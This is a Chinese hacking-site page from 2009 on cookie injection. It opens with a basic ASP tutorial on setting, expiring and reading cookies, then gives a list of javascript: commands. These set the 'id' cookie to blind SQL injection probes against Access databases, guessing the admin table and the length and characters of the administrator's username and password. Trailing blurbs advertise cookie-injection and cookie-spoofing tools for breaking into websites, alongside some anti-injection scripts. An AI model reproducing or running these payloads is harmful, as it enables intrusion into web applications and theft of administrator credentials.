Cookies注入详解与指令 2009-10-29 10:19:54 www.hackbase.com 来源:互联网
1.如何写入Cookies? Response.Cookies("字段名")=变量或字符串,例如: Response.Cookies("name2")="Dingdang" 2.如何设置Cookies时间? Response.Cookies("字段名").expires=时间 ...
1.如何写入Cookies?
Response.Cookies("字段名")=变量或字符串,例如:
Response.Cookies("name2")="Dingdang"
2.如何设置Cookies时间?
Response.Cookies("字段名").expires=时间函数+N,例如:
Response.Cookies("name2").expires=date+1,表示Cookies保存1天,再比如:
Response.Cookies("name2").expires=Hour+8,表示Cookies保存8小时。
3.在以往的ASP教程中,很少有介绍Cookies退出的方法。在“退出”这个ASP页中可以这样写:
Response.Cookies("字段名")=""
之后,在客户端的浏览器就清除了Cookies,并且Cookies文件会消失。注意有多少个字段,就要写多少句来清除。
4.如何读取Cookies?
变量名=Request.Cookies("字段名"),例如:
name2=Request.Cookies("name2")
如果网页中写入<%=name2%>这句,则会显示“Dingdang”。
也可以这样直接读取Cookies,<%=Request.Cookies("name2")%>
Cookies是属于Session对象的一种。但有不同,Cookies不会占服务器资源;而“Session”则会占用服务器资源。所以,尽量不要使用Session,而使用Cookies。
指令:
javascript:alert(document.cookie="id="+escape("156 and 1=1"));
javascript:alert(document.cookie="id="+escape("26 and (select count(*) from admin)>0"));
//猜是否有admin表
javascript:alert(document.cookie="id="+escape("26 and (select count(username) from admin)>0"));
//猜是否有username表
javascript:alert(document.cookie="id="+escape("40 and (select len(username) from admin)=5"));
//看管理员密码是否是5位
javascript:alert(document.cookie="id="+escape("26 and (select top 1 asc(mid(username,1,1)) from admin)=97"));
//第一位是否是ASC码97,相当于a
javascript:alert(document.cookie="targetID="+escape("108 and (select top 1 unicode(substring(user,3,1)) from admin)=111"));
javascript:alert(document.cookie="id="+escape("26 and (select top 1 asc(mid(username,2,1)) from admin)=97"));
//第二位
javascript:alert(document.cookie="targetID="+escape("108 and (select count(*) from msysobjects)>0"));
//看系统表
分享到:
相关推荐
cookies 注入必备中转工具。cookie是注入利器 可以绕过防注入
cookies注入中转生成器 cookies注入中转生成器
cookies注入工具,很好很强大 cookies注入工具,很好很强大
【JavaScript】cookies操作详解
COOKIES注入php-5教程及脚本,配合程序PHP-5-WIN32使用,完成cookie注入攻击。 仅仅供学习使用,不可用于恶意攻击!恶意行为由下载者个人承担!
发现之前学习爬虫有些粗糙,竟然连requests中添加cookies都没有掌握,惭愧。废话不宜多,直接上内容。 我们平时使用requests获取网络内容很简单,几行代码搞定了,例如: import requests res=requests.get...
找到存在Cookies注入漏洞的网页 用注入中转生成一个asp页面,本地搭建asp环境,注入语句:...
cookies防注入
可以修改cookis的浏览器软件,可以修改cookis欺骗,用这种方法可以入侵很多网站,本人一直在用,软件原名:Cookies&Inject Browser
javascript 操作cookies详解及实例.docx
现在很多网站都采用了通用防注入程序,那么对于这种网站,我门是否就束手无策了呢?答案是否定的,因为我们可以采用cookie 注入的方法,而很多通用防注入程序对这种注入方式都没有防备。
本文实例讲述了Django框架设置cookies与获取cookies操作。分享给大家供大家参考,具体如下: 在Django里面,使用Cookie和Session看起来好像是一样的,使用的方式都是request.COOKIES[XXX]和request.session[XXX],...
ASP版实现cookies注入加速工具
基于cookies的攻击与防御技术,讲述cookies攻击原理,攻击案例,以及防御技术
许多站长的网站因为用得都是通用防注入,而防注入程序中可能没有考虑到COOKIES防注入,所以还是引起网站被黑,网上搜索而来的孤行一鬼防注入,可以防止POST,GET,COOKIES三种方式的注入攻击,有用的着的人自己下。
用于网站注入
cookie注入工具。cookie注入工具。cookie注入工具。